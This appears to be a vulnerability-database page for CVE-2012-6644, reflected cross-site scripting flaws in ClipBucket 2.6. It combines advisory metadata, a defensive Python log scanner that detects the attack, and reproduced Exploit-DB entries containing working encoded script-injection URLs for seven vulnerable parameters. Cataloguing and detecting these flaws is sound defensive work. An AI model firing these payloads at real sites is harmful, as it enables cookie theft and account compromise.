CVE-2012-6644
Published 2014-04-08
Priority: P4 · 23 · medium · CVSS 2.0: 4.3
CVSS vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
Exploit available
EPSS: 3.12% (86.2th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in ClipBucket 2.6 allow remote attackers to inject arbitrary web script or HTML via the (1) cat parameter to channels.php, (2) collections.php, (3) groups.php, or (4) videos.php; (5) query parameter to search_result.php; or (6) type parameter to view_collection.php or (7) view_item.php.
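An added example, not taken from any of the advisories indexed here: a defender-side scan of web-server access logs for requests that put markup characters into the seven script/parameter pairs listed above, decoding repeated percent-encoding first. The log lines, the `/cb/` path, the `cat=all` value and the character sets treated as suspicious are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Script -> parameter pairs from the CVE-2012-6644 description.
WATCHED = {
    "channels.php": "cat", "collections.php": "cat", "groups.php": "cat",
    "videos.php": "cat", "search_result.php": "query",
    "view_collection.php": "type", "view_item.php": "type",
}
# Assumption: cat/type never legitimately carry quotes or angle brackets;
# free-text search may contain quotes, so only angle brackets count there.
MARKUP = re.compile(r"[<>\"']")
SUSPICIOUS = {"cat": MARKUP, "type": MARKUP, "query": re.compile(r"[<>]")}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so %253C and %3C both become '<'."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(lines):
    """Return (line_no, script, param, decoded_value) for each suspicious hit."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        script = url.path.rsplit("/", 1)[-1]
        param = WATCHED.get(script)
        if param is None:
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            decoded = fully_decode(value)
            if name == param and SUSPICIOUS[param].search(decoded):
                hits.append((line_no, script, param, decoded))
    return hits

# Constructed sample lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Jan/2012:10:00:01 +0000] "GET /cb/videos.php?cat=all&sort=most_recent HTTP/1.1" 200 5120',
    '203.0.113.7 - - [09/Jan/2012:10:00:02 +0000] "GET /cb/videos.php?cat=%3CScRiPt%3Ealert(1)%3C%2FScRiPt%3E HTTP/1.1" 200 5301',
    '198.51.100.4 - - [09/Jan/2012:10:00:03 +0000] "GET /cb/search_result.php?query=don%27t+stop&submit=Search HTTP/1.1" 200 4100',
    '198.51.100.4 - - [09/Jan/2012:10:00:04 +0000] "GET /cb/view_item.php?item=1&type=%2522%253Cb%253E HTTP/1.1" 200 3900',
]
```

Calling `scan(SAMPLE_LOG)` flags the second and fourth lines; the fourth is double-encoded and would pass a filter that decodes only once.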
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| clip-bucket | clipbucket | — | — |
VulDB
Clip-bucket ClipBucket 2.6 channels.php Type cross site scripting (EDB-18341 / XFDB-72245)
vuldb·2026-05-10·CVSS 4.3
A vulnerability described as problematic has been identified in Clip-bucket ClipBucket 2.6. Affected is an unknown function of the file channels.php. Such manipulation of the argument Type leads to cross site scripting.
This vulnerability is referenced as CVE-2012-6644. It is possible to launch the attack remotely. Furthermore, an exploit is available.
GHSA
GHSA-4whx-q4g9-v3mj: Multiple cross-site scripting (XSS) vulnerabilities in ClipBucket 2
ghsa_unreviewed·2022-05-17
CVE-2012-6644 [MEDIUM] CWE-79 GHSA-4whx-q4g9-v3mj: Multiple cross-site scripting (XSS) vulnerabilities in ClipBucket 2
No detection rules found.
Exploit-DB
Clipbucket 2.6 - 'view_item.php?type' Cross-Site Scripting
exploitdb·2012-01-09
---
source: https://www.securityfocus.com/bid/51321/info
ClipBucket is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ClipBucket 2.6 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/view_item.php?collection=9&item=KWSWG7S983SY&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E
Exploit-DB
Clipbucket 2.6 - 'groups.php?cat' Cross-Site Scripting
exploitdb·2012-01-09
---
source: https://www.securityfocus.com/bid/51321/info
http://www.example.com/[path]/groups.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
Exploit-DB
Clipbucket 2.6 - 'videos.php?cat' Cross-Site Scripting
exploitdb·2012-01-09
---
source: https://www.securityfocus.com/bid/51321/info
http://www.example.com/[path]/videos.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
Exploit-DB
Clipbucket 2.6 - 'collections.php?cat' Cross-Site Scripting
exploitdb·2012-01-09
---
source: https://www.securityfocus.com/bid/51321/info
http://www.example.com/[path]/collections.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
Exploit-DB
Clipbucket 2.6 - 'view_collection.php?type' Cross-Site Scripting
exploitdb·2012-01-09
---
source: https://www.securityfocus.com/bid/51321/info
http://www.example.com/[path]/view_collection.php?cid=9&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E
Exploit-DB
Clipbucket 2.6 - Multiple Vulnerabilities
exploitdb·2012-01-09
---
# Exploit : Multiple Vulnerability on ClipBucket 2.6
# Date : 09 January 2012
# Author : YaDoY666
# Website : http://yadoy666.serverisdown.org
# Software : Clip Bucket (Open Source Video Sharing)
# Version : 2.6
# Vendor : Clip Bucket (http://clip-bucket.com)
# Vendor Response : None
Cross Site Scripting
[[=]] http://[site]/[path]/channels.php
[[=]] http://[site]/[path]/collections.php
[[=]] http://[site]/[path]/groups.php
[[=]] http://[site]/[path]/search_result.php
[[=]] http://[site]/[path]/videos.php
[[=]] http://[site]/[path]/view_collection.php
[[=]] http://[site]/[path]/view_item.php
Example :
http://[site]/[path]/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&s
Exploit-DB
Clipbucket 2.6 - 'channels.php?cat' Cross-Site Scripting
exploitdb·2012-01-09
---
source: https://www.securityfocus.com/bid/51321/info
http://www.example.com/[path]/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
Exploit-DB
Clipbucket 2.6 - 'search_result.php?query' Cross-Site Scripting
exploitdb·2012-01-09
---
source: https://www.securityfocus.com/bid/51321/info
http://www.example.com/[path]/search_result.php?query=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&submit=Search&type=
No writeups or analysis indexed.
http://osvdb.org/78193
http://osvdb.org/78194
http://osvdb.org/78195
http://osvdb.org/78196
http://osvdb.org/78197
http://osvdb.org/78198
http://osvdb.org/78199
http://osvdb.org/78200
http://packetstormsecurity.org/files/108489/clipbucket-sqlxss.txt
http://secunia.com/advisories/47474
http://www.exploit-db.com/exploits/18341
http://www.securityfocus.com/bid/51321
https://exchange.xforce.ibmcloud.com/vulnerabilities/72245